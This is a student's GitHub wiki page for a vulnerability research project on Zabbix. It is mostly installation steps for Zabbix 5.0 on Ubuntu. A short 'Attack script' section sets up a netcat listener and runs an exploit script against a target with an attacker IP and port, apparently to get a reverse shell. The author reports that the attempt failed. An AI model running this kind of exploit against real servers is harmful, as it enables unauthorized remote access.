Project 1 ‐ Vulnerability Research (Zabbix) - FlameSpyro/Tech-Journal GitHub Wiki

Project 1 - Vulnerability Research (Zabbix)

  • Notice: My research and attempt looking and exploiting the Zabbix Server has been unsuccessful in completing. This guide will explain the installation process in installing Zabbix newest version and the exploit running.
  • Video Demonstration

Zabbix Installation

Pre-requisites

  • A install of Focal Ubuntu 20.04
  • Access to root user

Installation

  • Download the package needed and open it up!
wget https://repo.zabbix.com/zabbix/5.0/ubuntu/pool/main/z/zabbix-release/zabbix-release_5.0-1+focal_all.deb
dpkg -i zabbix-release_5.0-1+focal_all.deb
apt update
apt install zabbix-server-mysql zabbix-frontend-php zabbix-apache-conf zabbix-agent
  • Open mysql which was installed with the packages and create a user Zabbix alongise a password of choice:
mysql -uroot -p
password
mysql> create database zabbix character set utf8 collate utf8_bin;
mysql> create user zabbix@localhost identified by 'password';
mysql> grant all privileges on zabbix.* to zabbix@localhost;
mysql> set global log_bin_trust_function_creators = 1;
mysql> quit;
  • Host import initial schema and data. This also prompts the creation of a new password
zcat /usr/share/doc/zabbix-server-mysql*/create.sql.gz | mysql -uzabbix -p zabbix
  • Disable log_bin_trust_function_creators option.
mysql -uroot -p
password
mysql> set global log_bin_trust_function_creators = 0;
mysql> quit;
  • Edit the /etc/zabbix/zabbix_server.conf to add a password for the zabbix user
sudo nano /etc/zabbix/zabbix_server.conf
# Uncomment near DBUser
DBPassword=password
  • Edit the /etc/zabbix/apache.conf and select a proper timezone
sudo nano /etc/zabbix/apache.conf
php_value date.timezone Europe/Riga
  • Reboot Server
systemctl restart zabbix-server zabbix-agent apache2
systemctl enable zabbix-server zabbix-agent apache2
Finish installation and login

Attack script

  • Within the attacker machine, download the exploit here
  • In another window open a netcat session
nc -nlvp 8888
  • On the original window
./expoit.py <target url>  <username> <password> <attacker ip> <attacker port>

Troubleshooting

  • As the video demonstration explains, version 5.0.17 has been proven extremely difficult to setup.
  • This installation installs 5.0.38 and the exploit does not work on this version.
  • The zabbix repository has been proven messy and unsuccessful for downloading ubuntu and debian packages.
⚠️ **GitHub.com Fallback** ⚠️